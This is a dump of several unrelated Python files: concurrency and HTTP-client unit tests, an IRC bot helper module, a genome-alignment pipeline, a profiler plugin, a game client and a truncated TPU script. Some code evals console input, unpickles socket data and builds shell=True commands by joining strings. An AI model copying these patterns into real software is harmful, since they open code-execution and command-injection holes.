def test_submit(self): future = self.executor.submit(pow, 2, 8) self.assertEqual(256, future.result()) def test_submit_keyword(self): future = self.executor.submit(mul, 2, y=8) self.assertEqual(16, future.result()) def test_map(self): self.assertEqual( list(self.executor.map(pow, range(10), range(10))), list(map(pow, range(10), range(10)))) def test_map_exception(self): i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5]) self.assertEqual(i.__next__(), (0, 1)) self.assertEqual(i.__next__(), (0, 1)) self.assertRaises(ZeroDivisionError, i.__next__) def test_map_timeout(self): results = [] try: for i in self.executor.map(time.sleep, [0, 0, 3], timeout=1.5): results.append(i) except futures.TimeoutError: pass else: self.fail('expected TimeoutError') self.assertEqual([None, None], results) class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest): pass class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest): pass class FutureTests(unittest.TestCase): def test_done_callback_with_result(self): callback_result = None def fn(callback_future): nonlocal callback_result callback_result = callback_future.result() f = Future() f.add_done_callback(fn) f.set_result(5) self.assertEqual(5, callback_result) def test_done_callback_with_exception(self): callback_exception = None def fn(callback_future): nonlocal callback_exception callback_exception = callback_future.exception() f = Future() f.add_done_callback(fn) f.set_exception(Exception('test')) self.assertEqual(('test',), callback_exception.args) def test_done_callback_with_cancel(self): was_cancelled = None def fn(callback_future): nonlocal was_cancelled was_cancelled = callback_future.cancelled() f = Future() f.add_done_callback(fn) self.assertTrue(f.cancel()) self.assertTrue(was_cancelled) def test_done_callback_raises(self): with test.support.captured_stderr() as stderr: raising_was_called = False fn_was_called = False def raising_fn(callback_future): nonlocal raising_was_called raising_was_called = True raise Exception('doh!') def fn(callback_future): nonlocal fn_was_called fn_was_called = True f = Future() f.add_done_callback(raising_fn) f.add_done_callback(fn) f.set_result(5) self.assertTrue(raising_was_called) self.assertTrue(fn_was_called) self.assertIn('Exception: doh!', stderr.getvalue()) def test_done_callback_already_successful(self): callback_result = None def fn(callback_future): nonlocal callback_result callback_result = callback_future.result() f = Future() f.set_result(5) f.add_done_callback(fn) self.assertEqual(5, callback_result) def test_done_callback_already_failed(self): callback_exception = None def fn(callback_future): nonlocal callback_exception callback_exception = callback_future.exception() f = Future() f.set_exception(Exception('test')) f.add_done_callback(fn) self.assertEqual(('test',), callback_exception.args) def test_done_callback_already_cancelled(self): was_cancelled = None def fn(callback_future): nonlocal was_cancelled was_cancelled = callback_future.cancelled() f = Future() self.assertTrue(f.cancel()) f.add_done_callback(fn) self.assertTrue(was_cancelled) def test_repr(self): self.assertRegex(repr(PENDING_FUTURE), '<Future at 0x[0-9a-f]+ state=pending>') self.assertRegex(repr(RUNNING_FUTURE), '<Future at 0x[0-9a-f]+ state=running>') self.assertRegex(repr(CANCELLED_FUTURE), '<Future at 0x[0-9a-f]+ state=cancelled>') self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE), '<Future at 0x[0-9a-f]+ state=cancelled>') self.assertRegex( repr(EXCEPTION_FUTURE), '<Future at 0x[0-9a-f]+ state=finished raised 
IOError>') self.assertRegex( repr(SUCCESSFUL_FUTURE), '<Future at 0x[0-9a-f]+ state=finished returned int>') def test_cancel(self): f1 = create_future(state=PENDING) f2 = create_future(state=RUNNING) f3 = create_future(state=CANCELLED) f4 = create_future(state=CANCELLED_AND_NOTIFIED) f5 = create_future(state=FINISHED, exception=IOError()) f6 = create_future(state=FINISHED, result=5) self.assertTrue(f1.cancel()) self.assertEqual(f1._state, CANCELLED) self.assertFalse(f2.cancel()) self.assertEqual(f2._state, RUNNING) self.assertTrue(f3.cancel()) self.assertEqual(f3._state, CANCELLED) self.assertTrue(f4.cancel()) self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED) self.assertFalse(f5.cancel()) self.assertEqual(f5._state, FINISHED) self.assertFalse(f6.cancel()) self.assertEqual(f6._state, FINISHED) def test_cancelled(self): self.assertFalse(PENDING_FUTURE.cancelled()) self.assertFalse(RUNNING_FUTURE.cancelled()) self.assertTrue(CANCELLED_FUTURE.cancelled()) self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled()) self.assertFalse(EXCEPTION_FUTURE.cancelled()) self.assertFalse(SUCCESSFUL_FUTURE.cancelled()) def test_done(self): self.assertFalse(PENDING_FUTURE.done()) self.assertFalse(RUNNING_FUTURE.done()) self.assertTrue(CANCELLED_FUTURE.done()) self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done()) self.assertTrue(EXCEPTION_FUTURE.done()) self.assertTrue(SUCCESSFUL_FUTURE.done()) def test_running(self): self.assertFalse(PENDING_FUTURE.running()) self.assertTrue(RUNNING_FUTURE.running()) self.assertFalse(CANCELLED_FUTURE.running()) self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running()) self.assertFalse(EXCEPTION_FUTURE.running()) self.assertFalse(SUCCESSFUL_FUTURE.running()) def test_result_with_timeout(self): self.assertRaises(futures.TimeoutError, PENDING_FUTURE.result, timeout=0) self.assertRaises(futures.TimeoutError, RUNNING_FUTURE.result, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_FUTURE.result, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0) self.assertRaises(IOError, EXCEPTION_FUTURE.result, timeout=0) self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42) def test_result_with_success(self): # TODO(brian@sweetapp.com): This test is timing dependant. def notification(): # Wait until the main thread is waiting for the result. time.sleep(1) f1.set_result(42) f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertEqual(f1.result(timeout=5), 42) def test_result_with_cancel(self): # TODO(brian@sweetapp.com): This test is timing dependant. def notification(): # Wait until the main thread is waiting for the result. time.sleep(1) f1.cancel() f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertRaises(futures.CancelledError, f1.result, timeout=5) def test_exception_with_timeout(self): self.assertRaises(futures.TimeoutError, PENDING_FUTURE.exception, timeout=0) self.assertRaises(futures.TimeoutError, RUNNING_FUTURE.exception, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_FUTURE.exception, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0) self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0), IOError)) self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None) def test_exception_with_success(self): def notification(): # Wait until the main thread is waiting for the exception. 
time.sleep(1) with f1._condition: f1._state = FINISHED f1._exception = IOError() f1._condition.notify_all() f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertTrue(isinstance(f1.exception(timeout=5), IOError)) @test.support.reap_threads def test_main(): try: test.support.run_unittest(ProcessPoolExecutorTest, ThreadPoolExecutorTest, ProcessPoolWaitTests, ThreadPoolWaitTests, ProcessPoolAsCompletedTests, ThreadPoolAsCompletedTests, FutureTests, ProcessPoolShutdownTest, ThreadPoolShutdownTest) finally: test.support.reap_children() if __name__ == "__main__": test_main()
freetests.py
#!/usr/bin/env python3 # coding: utf-8 # Copyright 2013 Abram Hindle # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # run python freetests.py import unittest import httpclient import http.server import threading import socketserver import random import time import urllib.parse import json BASEHOST = '127.0.0.1' BASEPORT = 27600 + random.randint(1,100) httpclass = httpclient #import mysolution #httpclass = mysolution # Sorry but in Python this comes out of the box! class MyHTTPHandler(http.server.BaseHTTPRequestHandler): post = None get = None def do_POST(self): try: if (self.post == None): return None else: return self.post() except Exception as e: print("Exception %s\n" % e) raise e def do_GET(self): try: print("GET %s\n" % self.path) if (self.get == None): return None else: return self.get() except Exception as e: print("Exception %s\n" % e) raise e def make_http_server(host = BASEHOST, port = BASEPORT): return http.server.HTTPServer( (host, port) , MyHTTPHandler) # always returns 404 def nothing_available(self): self.send_error(404, "File not found") self.end_headers() self.wfile.write(bytes("","utf-8")) # repeats your path back def echo_path_get(self): self.send_response(200) self.send_header("Content-type", "text/plain") self.end_headers() self.wfile.write(bytes("%s\n" % self.path,"utf-8")) # repeats your post back as json def echo_post(self): length = int(self.headers['Content-Length']) post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8')) self.send_response(200) self.send_header("Content-type", "application/json") self.end_headers() self.wfile.write(bytes(json.dumps(post_data),"utf-8")) def header_check(self): response = 200 errors = [] if 'Host' not in self.headers: response = 400 errors.append("No Host header found") self.send_response(response) self.send_header("Content-type", "application/json") self.end_headers() self.wfile.write(bytes(json.dumps(errors),"utf-8")) def die_on_method(self): response = 405 errors = [] errors.append("Method Not Allowed") if 'Host' not in self.headers: errors.append("No Host header found") self.send_response(response) self.send_header("Content-type", "application/json") self.end_headers() self.wfile.write(bytes(json.dumps(errors),"utf-8")) def post_header_check(self): response = 200 errors = [] if 'Host' not in self.headers: response = 400 errors.append("No Host header found") if 'Content-length' not in self.headers: response = 400 errors.append("No Content-Length header found") self.send_response(response) self.send_header("Content-type", "application/json") self.end_headers() self.wfile.write(bytes(json.dumps(errors),"utf-8")) class TestHTTPClient(unittest.TestCase): httpd = None running = False @classmethod def setUpClass(self): '''Cache the httpd server and run it as a thread''' if (TestHTTPClient.httpd == None): try: self.thread = threading.Thread(target=self.run_server).start() time.sleep(1) except Exception as e: print(e) print("setUP: Thread died") raise(e) @classmethod def run_server(self): '''run the httpd server in a thread''' 
try: socketserver.TCPServer.allow_reuse_address = True http.server.HTTPServer.allow_reuse_address = True TestHTTPClient.httpd = make_http_server() print("HTTP UP!\n") TestHTTPClient.httpd.serve_forever() print("HTTP has been shutdown!\n") except Exception as e: print(e) print("run_server: Thread died") def test404GET(self): '''Test against 404 errors''' MyHTTPHandler.get = nothing_available http = httpclass.HTTPClient() req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) ) self.assertTrue(req != None, "None Returned!") self.assertTrue(req.code == 404) def test404POST(self): '''Test against 404 errors''' MyHTTPHandler.post = nothing_available http = httpclass.HTTPClient() req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) ) self.assertTrue(req != None, "None Returned!") self.assertTrue(req.code == 404) def testGET(self): '''Test HTTP GET''' MyHTTPHandler.get = echo_path_get http = httpclass.HTTPClient() path = "abcdef/gjkd/dsadas" url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path) req = http.GET( url ) self.assertTrue(req != None, "None Returned!") self.assertTrue(req.code == 200) self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body) def testGETHeaders(self): '''Test HTTP GET Headers''' MyHTTPHandler.get = header_check MyHTTPHandler.post = die_on_method http = httpclass.HTTPClient() path = "abcdef/gjkd/dsadas" url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path) req = http.GET( url ) self.assertTrue(req != None, "None Returned!") self.assertTrue(req.code == 200) def testPOSTHeaders(self): '''Test HTTP POST Headers''' MyHTTPHandler.post = post_header_check MyHTTPHandler.get = die_on_method http = httpclass.HTTPClient() path = "abcdef/gjkd/dsadas" url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path) req = http.POST( url ) self.assertTrue(req != None, "None Returned!") self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code) # consider disabling this test until everything else works def testInternetGets(self): '''Test HTTP Get in the wild, these webservers are far less forgiving''' MyHTTPHandler.get = echo_path_get http = httpclass.HTTPClient() urls = [ "http://www.cs.ualberta.ca/", "http://softwareprocess.es/static/SoftwareProcess.es.html", "http://c2.com/cgi/wiki?CommonLispHyperSpec", "http://slashdot.org" ] for url in urls: try: req = http.GET( url ) except Exception as e: print("An Exception was thrown for %s" % url) self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e)) self.assertTrue(req != None, "None Returned! 
%s" % url) self.assertTrue(req.code == 200 or req.code == 301 or req.code == 302, "Code: %s for %s" % (req.code, url)) if (req.code == 200): self.assertTrue(req.body.find("DOCTYPE")>=0 or req.body.find("<body")>=0 , "%s Data: [%s] " % (url,req.body)) def testPOST(self): '''Test HTTP POST with an echo server''' MyHTTPHandler.post = echo_post http = httpclass.HTTPClient() path = "post_echoer" url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path) args = {'a':'aaaaaaaaaaaaa', 'b':'bbbbbbbbbbbbbbbbbbbbbb', 'c':'c', 'd':'012345\r67890\n2321321\n\r'} print("Sending POST!") req = http.POST( url, args=args ) self.assertTrue(req != None, "None Returned!") self.assertTrue(req.code == 200) print("Test Post Body: [%s]" % req.body) outargs = json.loads(req.body) print(outargs.__class__) for key in args: self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key) for key in outargs: self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key) @classmethod def tearDownClass(self): if (TestHTTPClient.httpd!=None): print("HTTP Shutdown in tearDown\n") TestHTTPClient.httpd.shutdown() TestHTTPClient.httpd.server_close() time.sleep(1) def test_test_webserver(): print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) ) MyHTTPHandler.get = echo_path_get MyHTTPHandler.post = echo_post httpd = make_http_server() try: httpd.serve_forever() finally: httpd.shutdown() if __name__ == '__main__': unittest.main()
common.py
# http://inamidst.com/saxo/ # Created by Sean B. Palmer # You know your code is good when you don't have a generic module import base64 import collections import os import pickle import signal import socket import sys import threading # Usage as of 534f8c68: # b64pickle: client # b64unpickle: client, scheduler # error: client, create, script # exit_cleanly: client, saxo # populate: client, create # thread: client, script def console(): # TODO: This can probably be removed client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client_sock = os.path.expanduser("~/.saxo/client.sock") client.connect(client_sock) while True: try: text = input("$ ") except (EOFError, KeyboardInterrupt): print("") print("Quitting...") break if " " in text: instruction, args = text.split(" ", 1) if args: args = eval("(%s,)" % args) args = b64pickle(args) else: instruction, args = text, b"" octets = instruction.encode("ascii") + b" " + args client.send(octets + b"\n") def error(short, long=None, err=None, code=1): print("saxo: error: " + short, file=sys.stderr) if long is not None: print(long.rstrip(), file=sys.stderr) if err is not None: if long is not None: print("", file=sys.stderr) print("This is the error message that python gave:", file=sys.stderr) print("", file=sys.stderr) print(" %s" % err.__class__.__name__) print(" %s" % err) sys.exit(code) def exit_cleanly(): def quit(signum, frame): print("Exiting cleanly (SIG %s)" % signum) try: sys.exit() finally: os._exit(0) signal.signal(signal.SIGINT, quit) signal.signal(signal.SIGTERM, quit) def populate(saxo_path, base): # TODO: This is being called twice plugins = os.path.join(base, "plugins") saxo_plugins = os.path.join(saxo_path, "plugins") if not os.path.isdir(plugins): os.mkdir(plugins) commands = os.path.join(base, "commands") saxo_commands = os.path.join(saxo_path, "commands") if not os.path.isdir(commands): os.mkdir(commands) def symlink(source, dest): try: os.symlink(source, dest) except FileExistsError: ... for name in os.listdir(saxo_plugins): dest = os.path.join(plugins, name) if not (os.path.exists(dest) or os.path.islink(dest)): symlink(os.path.join(saxo_plugins, name), dest) with open(os.path.join(commands, "saxo.pth"), "w") as f: f.write(saxo_path + "\n") old_path_file = os.path.join(commands, ".saxo-path") if os.path.islink(old_path_file): os.remove(old_path_file) for name in os.listdir(saxo_commands): dest = os.path.join(commands, name) if not (os.path.exists(dest) or os.path.islink(dest)): symlink(os.path.join(saxo_commands, name), dest) # Clean up any broken symlinks for directory in (plugins, commands): for name in os.listdir(directory): link = os.path.join(directory, name) if not os.path.islink(link): continue target = os.readlink(link) target = os.path.join(directory, target) if not os.path.exists(target): os.remove(link) def b64pickle(obj): pickled = pickle.dumps(obj) return base64.b64encode(pickled) def b64unpickle(data): if data: pickled = base64.b64decode(data) return pickle.loads(pickled) return tuple() def thread(target, *args): t = threading.Thread(target=target, args=tuple(args), daemon=True) t.start() return t def tarjan(graph): # Robert E. 
Tarjan's 1975 strongly connected nodes algorithm # This is a kind of robust topological sort index = {} lowlinks = {} stack = collections.OrderedDict() result = [] def search(node): index[node] = len(index) lowlinks[node] = index[node] stack[node] = None for succ in graph.get(node, ()): if succ not in index: search(succ) lowlinks[node] = min(lowlinks[succ], lowlinks[node]) elif succ in stack: lowlinks[node] = min(lowlinks[node], index[succ]) if lowlinks[node] == index[node]: connected = [] succ = None while succ != node: succ = stack.popitem()[0] connected.append(succ) result.append(connected) for node in graph: if not node in index: search(node) return result def tsort(graph): for connected in tarjan(graph): for node in connected: yield node
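# A small, self-contained check of tarjan()/tsort() above (illustrative only):
# the cycle between "b" and "c" should come out as one strongly connected
# component, and tsort() should yield dependencies before their dependents.
if __name__ == "__main__":
    graph = {
        "a": ["b"],        # a depends on b
        "b": ["c"],
        "c": ["b", "d"],   # b and c form a cycle
        "d": [],
    }
    print(tarjan(graph))        # [['d'], ['c', 'b'], ['a']]
    print(list(tsort(graph)))   # ['d', 'c', 'b', 'a']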
external_tools.py
import logging import multiprocessing import os from subprocess import run from Bio import SeqIO, AlignIO from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from constants import CD_HIT_CLUSTER_REPS_OUTPUT_FILE, CLUSTERS_NT_SEQS_DIR, CLUSTERS_ALIGNMENTS_DIR, \ NUMBER_OF_PROCESSES, FASTA_FILE_TYPE, ALIGNMENTS_FOR_TREE_DIR, DATA_DIR, ALIGNMENT_STRAIN_PATTERN, STRAINS_COUNT from data_analysis import build_strain_names_map from logging_config import worker_configurer def perform_clustering_on_proteins(aggregated_proteins_file_path): """Run the CD-HIT program to perform clustering on the strains""" logger = logging.getLogger() logger.info("Running CD-HIT on combined proteins file to create clustering") cd_hit_args = " ".join(["cd-hit", "-i", aggregated_proteins_file_path, "-o", CD_HIT_CLUSTER_REPS_OUTPUT_FILE, "-c 0.70", "-n 5", "-M 16000", "-g 1", "-p 1"]) cd_hit_return_code = run(cd_hit_args, shell=True).returncode logger.info("Finished running CD-HIT with return code %d" % cd_hit_return_code) return cd_hit_return_code def perform_clustering_on_cds(input_file, output_file): """Run the CD-HIT-EST program to perform clustering on the strains representatives and pseudogenes""" logger = logging.getLogger() logger.info("Running CD-HIT-EST on combined representative and pseudogene cds file to create clustering") cd_hit_est_args = " ".join(["cd-hit-est", "-i", input_file, "-o", output_file, "-c 0.8", "-n 5", "-M 16000", "-g 1", "-p 1", "-d 30"]) cd_hit_est_return_code = run(cd_hit_est_args, shell=True).returncode logger.info("Finished running CD-HIT with return code %d" % cd_hit_est_return_code) return cd_hit_est_return_code def perform_alignment_on_core_clusters(log_queue): """Run MAFFT & Gblocks tools on fasta files of protein nucleotide seqs for each core cluster""" logger = logging.getLogger(__name__) logger.info("Running MAFFT & Gblocks on core clusters for alignment") if not os.path.exists(CLUSTERS_NT_SEQS_DIR): logger.error("No clusters dir found, exiting") exit(1) if not os.path.exists(CLUSTERS_ALIGNMENTS_DIR): os.makedirs(CLUSTERS_ALIGNMENTS_DIR) job_queue = multiprocessing.Queue() prepare_alignment_jobs(job_queue) workers = [ multiprocessing.Process(target=perform_alignment_and_pruning, args=(i, job_queue, worker_configurer, log_queue)) for i in range(NUMBER_OF_PROCESSES)] for w in workers: w.start() job_queue.put(None) for w in workers: w.join() logger.info("Finished running MAFFT for all clusters") def prepare_alignment_jobs(job_queue): """Put all downloaded strain dirs in job queue for workers""" core_clusters = os.listdir(CLUSTERS_NT_SEQS_DIR) for cluster_file in core_clusters: job_queue.put(cluster_file) def perform_alignment_and_pruning(worker_id, job_queue, configurer, log_queue): """ Perform MAFFT alignment and Gblocks pruning for a core cluster fasta file """ configurer(log_queue) logger = logging.getLogger(__name__ + "_worker_" + str(worker_id)) while True: cluster_file = job_queue.get() if cluster_file is None: job_queue.put(None) break logger.info("Running MAFFT for %s" % cluster_file) alignment_stdout = open("alignment_stdout.log", "w") alignment_stderr = open("alignment_stderr.log", "w") cluster_alignment_filename = cluster_file + "_alignment" if not os.path.exists(os.path.join(CLUSTERS_ALIGNMENTS_DIR, cluster_alignment_filename)): cluster_alignment_file = open(os.path.join(CLUSTERS_ALIGNMENTS_DIR, cluster_alignment_filename), 'w') mafft_args = " ".join(["mafft", "--auto", os.path.join(CLUSTERS_NT_SEQS_DIR, cluster_file)]) mafft_return_code = run(mafft_args, 
shell=True, stdout=cluster_alignment_file, stderr=alignment_stderr).returncode logger.info("Finished running MAFFT for %s with return code %d" % (cluster_file, mafft_return_code)) cluster_alignment_file.close() logger.info("Running GBlocks for %s" % cluster_file) gblocks_args = " ".join(["Gblocks", os.path.join(CLUSTERS_ALIGNMENTS_DIR, cluster_alignment_filename), "-t=d", "-b5=a", "-p=n"]) gblocks_return_code = run(gblocks_args, shell=True, stdout=alignment_stdout, stderr=alignment_stderr).returncode logger.info( "Finished running Gblocks for alignment %s with return code %d" % (cluster_alignment_filename, gblocks_return_code)) def prepare_alignments_for_tree(log_queue): """Edit each alignment to remove invariant positions, pad missing strain seqs & concatenate all alignments""" logger = logging.getLogger(__name__) logger.info("Preparing core clusters alignments for tree") if not os.path.exists(CLUSTERS_ALIGNMENTS_DIR): logger.error("No alignments dir found, exiting") exit(1) if not os.path.exists(ALIGNMENTS_FOR_TREE_DIR): os.makedirs(ALIGNMENTS_FOR_TREE_DIR) job_queue = multiprocessing.Queue() prepare_alignment_editing_jobs(job_queue) workers = [ multiprocessing.Process(target=perform_alignment_editing, args=(i, job_queue, worker_configurer, log_queue)) for i in range(NUMBER_OF_PROCESSES)] for w in workers: w.start() job_queue.put(None) for w in workers: w.join() logger.info("Finished editing all alignments, concatenating") edited_alignment_files = os.listdir(ALIGNMENTS_FOR_TREE_DIR) concatenated_alignment = None concatenated_alignment_file = os.path.join(DATA_DIR, "all_alignments") for edited_alignment_file in edited_alignment_files: logger.info("Concatenating alignment %s" % edited_alignment_file) with open(os.path.join(ALIGNMENTS_FOR_TREE_DIR, edited_alignment_file), "r") as f: edited_alignment = AlignIO.read(f, FASTA_FILE_TYPE) if not concatenated_alignment: concatenated_alignment = edited_alignment[:, :] else: concatenated_alignment += edited_alignment[:, :] AlignIO.write(concatenated_alignment, open(concatenated_alignment_file, "w"), FASTA_FILE_TYPE) logger.info("Finished concatenating all alignments, written to %s" % concatenated_alignment_file) def prepare_alignment_editing_jobs(job_queue): """Put all downloaded strain dirs in job queue for workers""" alignments = os.listdir(CLUSTERS_ALIGNMENTS_DIR) for alignment_file in alignments: if alignment_file.endswith("-gb"): job_queue.put(alignment_file) def perform_alignment_editing(worker_id, job_queue, configurer, log_queue): """ Perform alignment editing """ configurer(log_queue) logger = logging.getLogger(__name__ + "_worker_" + str(worker_id)) while True: alignment_file = job_queue.get() if alignment_file is None: job_queue.put(None) break logger.info("Editing alignment %s" % alignment_file) alignment = AlignIO.read(open(os.path.join(CLUSTERS_ALIGNMENTS_DIR, alignment_file), "r"), FASTA_FILE_TYPE) edited_alignment = None for col_idx in range(alignment.get_alignment_length()): col = alignment[:, col_idx:col_idx + 1] col_str = alignment[:, col_idx] if not all(c == col_str[0] for c in col_str): if not edited_alignment: edited_alignment = col else: edited_alignment += col alignment_seq_len = edited_alignment.get_alignment_length() logger.info("alignment_seq_len = %d" % alignment_seq_len) strain_idx = 0 while strain_idx < STRAINS_COUNT: logger.info("in while - strain_idx = %d" % strain_idx) if len(edited_alignment) > strain_idx: seq = edited_alignment[strain_idx] seq_strain_idx = int(ALIGNMENT_STRAIN_PATTERN.match(seq.id).group(1)) 
logger.info("checking if strain idx %d < seq_strain_idx %d" % (strain_idx, seq_strain_idx)) if strain_idx < seq_strain_idx: for i in range(seq_strain_idx - strain_idx): logger.info("adding padded seq at idx %d" % (strain_idx + i)) edited_alignment._records.insert(strain_idx + i, SeqRecord(Seq(alignment_seq_len * '-'), id="[%d] padding" % (strain_idx + i))) strain_idx += (seq_strain_idx - strain_idx + 1) continue strain_idx += 1 else: logger.info("adding padded seq at end of alignment list") edited_alignment.append(SeqRecord(Seq(alignment_seq_len * '-'), id="[%d] padding" % strain_idx)) strain_idx += 1 alignment_file_edited = os.path.join(ALIGNMENTS_FOR_TREE_DIR, alignment_file) logger.info("Finished padding alignment - writing to file %s" % alignment_file_edited) AlignIO.write(edited_alignment, open(alignment_file_edited, "w"), FASTA_FILE_TYPE) def format_concatenated_alignment(): logger = logging.getLogger(__name__) strain_names_map = build_strain_names_map() tree_alignment = AlignIO.read(open(os.path.join(DATA_DIR, "all_alignments"), "r"), FASTA_FILE_TYPE) tree_alignment_filtered = AlignIO.MultipleSeqAlignment([]) for id, strain in zip(range(STRAINS_COUNT), tree_alignment): if all(c == '-' for c in strain.seq): logger.info("skipping filtered strain %d" % id) else: logger.info("adding id to strain %d" % id) strain.id = "[" + str(id) + "]" + strain_names_map[id] strain.description = '' tree_alignment_filtered.append(strain) AlignIO.write(tree_alignment_filtered, open(os.path.join(DATA_DIR, "filtered_tree_alignment"), "w"), FASTA_FILE_TYPE)
testThread.py
import threading
import time


def threadf(name):
    print("Thread %s: starting thread" % name)
    x = 0
    while True:
        time.sleep(1)
        s = "Thread " + str(x)
        print(s)
        x = x + 1


if __name__ == "__main__":
    print("Starting Program")
    x = threading.Thread(target=threadf, args=(1,))
    x.start()
    y = 0
    while True:
        time.sleep(2)
        s = "Main: " + str(y)
        print(s)
        y = y + 1
psutil_monitor.py
# licensed under the apache license: http://www.apache.org/licenses/license-2.0 # for details: https://github.com/gaogaotiantian/vizplugins/blob/master/notice.txt import multiprocessing as mp import os from viztracer.vizplugin import VizPluginBase from .monitor_process import MonitorProcess class PsutilMonitor(VizPluginBase): def __init__(self, options, interval): super().__init__() self.action_queue = mp.Queue() self.data_queue = mp.Queue() self.options = options self.interval = interval def support_version(self): return "0.11.0" def message(self, m_type, payload): if m_type == "event": if payload["when"] == "initialize": return self.generate_process() elif payload["when"] == "post-stop": return self.stop_recording() elif payload["when"] == "pre-save": return self.save_data() elif payload["when"] == "pre-start": return self.start_recording() elif m_type == "command": if payload["cmd_type"] == "terminate": return self.terminate() return {} def generate_process(self): self.cpu_process = mp.Process(target=MonitorProcess(self.action_queue, self.data_queue, self.options, self.interval), daemon=True) self.cpu_process.start() return {} def start_recording(self): return self.send_action("start") def stop_recording(self): return self.send_action("stop") def save_data(self): self.recording = self.send_action("get-data") return {"action": "handle_data", "handler": self.append_data} def append_data(self, data): pid = os.getpid() for k in self.recording.keys(): for data_point in self.recording[k]: d = {"name": k, "ph": "C", "ts": data_point["ts"] * (1e6), "args": data_point["arg"], "pid": pid, "tid": pid} data["traceEvents"].append(d) def terminate(self): self.send_action("terminate") self.cpu_process.join() return {"success": True} def send_action(self, message): self.action_queue.put(message) return self.data_queue.get()
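# A hedged usage sketch for the plugin above: VizTracer accepts plugin instances
# through its "plugins" argument, and this class is normally constructed by the
# vizplugins entry point rather than by hand. The option names, interval, and
# workload below are placeholders, not values confirmed by this module.
#
# from viztracer import VizTracer
#
# monitor = PsutilMonitor(options=["cpu", "memory"], interval=0.1)  # assumed option names
# with VizTracer(plugins=[monitor], output_file="result.json"):
#     do_work()   # hypothetical workload being traced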
main.py
from game import Game
import sys
import threading
from signalrcore.hub_connection_builder import HubConnectionBuilder


def main(game_token=''):
    game = None
    user_token = None
    if game_token == '':
        game = Game('user1', game_token)
        user_token, game_token = game.start()
        game.game_token = game_token
        print(game_token)
    else:
        game = Game('user2', game_token)
        user_token = game.accept()

    hub_connection = HubConnectionBuilder().with_url(
        "ws://localhost:5000/engine",
        options={
            "access_token_factory": lambda: user_token
        }).with_automatic_reconnect({
            "type": "raw",
            "keep_alive_interval": 10,
            "reconnect_interval": 5,
            "max_attempts": 5
        }).build()
    hub_connection.start()
    hub_connection.on("Shot", lambda _: game.shot())
    hub_connection.on("Accepted", lambda _: game.accepted())

    while True:
        command = input()
        if command.lower() == 'quit':
            print("Goodbye!")
            return
        if command.lower().startswith('shoot'):
            command = command.replace('shoot', '')
            (x, y) = list(map(int, command.split()))
            game.shoot(x, y)


if __name__ == '__main__':
    thread = None
    if len(sys.argv) > 1:
        thread = threading.Thread(target=main, args=(sys.argv[1], ))
    else:
        thread = threading.Thread(target=main)
    thread.start()
tpu_survival.py
# Adapted from https://github.com/GoogleCloudPlatform/cloudml-samples/tree/master/tpu/utils/survival import json import logging from multiprocessing import Process import os import shlex import signal from subprocess import PIPE from subprocess import Popen import time from googleapiclient import discovery from oauth2client.client import GoogleCredentials RUN_TASK_COMMAND = 'bash run.sh {tpu_name} {model}' TENSORFLOW_VERSION = '1.13' credentials = GoogleCredentials.get_application_default() class TPUSurvival(object): def __init__(self, project=None, location=None, id=None, params=None, d=None): if d is None: self.project = project self.location = location self.prefix = params["name"] self.id = id self.params = params self.running_time = 0. self.current_save = 0 self.done = False else: self.project = d["project"] self.location = d["location"] self.params = d["params"] self.prefix = self.params["name"] self.id = d["id"] self.running_time = d["running_time"] self.current_save = d["current_save"] self.done = d["done"] # current running job self.current_process = None self.state = None self.created = False self.task_running = False def tpu_name(self): """Format tpu_name to be used in creation and deletion calls.""" return '{}'.format(self.prefix) def tpu_cidr_block(self): """Format CIDR block to be used in creation calls.""" cidr = '10.0.{}.0/29'.format(self.id) return cidr def update_state(self): """Poll the TPU nodes and update self.state.""" nodes = list_tpus(self.project, self.location).get('nodes', []) self.state = None for node in nodes: name = node['name'] tpu_name = name.split('/')[-1] health = node.get('health', None) state = node['state'] # The node that is running the current task. if tpu_name == self.tpu_name(): # logging.info('{} - TPU health/state: {}: {}/{}'.format(self.prefix, tpu_name, health, state)) self.state = state if self.state is None: self.created = False def kill_current_task(self): """Kill the current running task.""" logging.info('{} - killing current process: {}'.format(self.prefix, self.current_process.pid)) # The subprocess runs a shell command, which in turn calls python. # This kills the whole process group with the shell command as the # process group 